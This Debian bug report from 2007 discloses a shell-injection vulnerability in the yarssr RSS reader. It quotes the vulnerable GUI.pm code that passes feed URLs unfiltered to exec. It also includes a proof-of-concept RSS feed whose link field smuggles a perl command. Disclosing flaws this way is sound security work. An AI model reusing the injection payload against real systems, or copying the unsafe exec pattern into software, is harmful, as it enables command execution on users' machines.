Package: yarssr
Version: 0.2.2-1
Severity: grave
Tags: security
Hi,
Duncan Gilmore reported this issue to me:
Am Freitag, den 26.10.2007, 03:19 +0100 schrieb Duncan Gilmore:
> Hi Joachim,
>
> Thanks for maintaining the yarssr package for Debian...
>
> I noticed a client-side code execution vulnerability in the yarssr
> GUI.pm module when gnome default url handling is not selected (and
> this is off by default in Ubuntu, assume so in Debian too).
>
> From the file GUI.pm:
> if (Yarssr::Config->get_usegnome) {
> Gnome2::URL->show($url);
> }
> else {
> if ($child = fork)
> {
> Glib::Idle->add(
> sub {
> my $kid = waitpid($child,WNOHANG);
> $kid > 0 ? return 0 : return 1;
> }
> );
> }
> else {
> my $b = Yarssr::Config->get_browser;
> $b .= " \"$url\"" unless $b =~ s/\%s/"$url"/;
> exec($b) or warn "unable to launch browser\n";
> exit;
> }
> }
>
> Shell character injection is possible because of incorrect use of exec
> and/or no filtering on the urls provided in feeds.
> If a user clicks on an article link like the one in the example feed
> below, commands can be passed silently to the shell.
>
> ================feed.rss===================
> <?xml version="1.0" encoding="ISO-8859-1"?>
> <rss version="2.0"
> xmlns:blogChannel="http://backend.userland.com/blogChannelModule";>
> <channel>
> <title>test feed</title>
> <item>
> <title>test post - create /tmp/created_file</title>
> <link>http://google.com";perl -e "print 'could run anything here' " >
> "/tmp/created_file</link>
> <pubDate>Fri, 26 Oct 2007 14:10:25 +0300</pubDate>
> </item>
> </channel>
> </rss>
> ================feed.rss===================
>
> I tried contacting the author through his sourceforge account about 3
> weeks ago but had no answer. Any chance you can get hold of him or get
> a fix in?
>
> Thanks and regards,
>
> D Gilmore
I will shortly upload something that hopefully fixes this.
Greetings,
Joachim
-- System Information:
Debian Release: lenny/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.21.otto
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages yarssr depends on:
ii libgnome2-perl 1.040-1 Perl interface to the GNOME librar
ii libgnome2-vfs-perl 1.080-1 Perl interface to the 2.x series o
ii libgtk2-gladexml-perl 1.006-1 Perl interface to use user interfa
ii libgtk2-perl 1:1.161-1 Perl interface to the 2.x series o
ii libgtk2-trayicon-perl 0.04-1 Perl interface to fill the system
ii libxml-rss-perl 1.05-1 Perl module for managing RSS (RDF
ii perl 5.8.8-11.1 Larry Wall's Practical Extraction
yarssr recommends no packages.
-- no debconf information
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
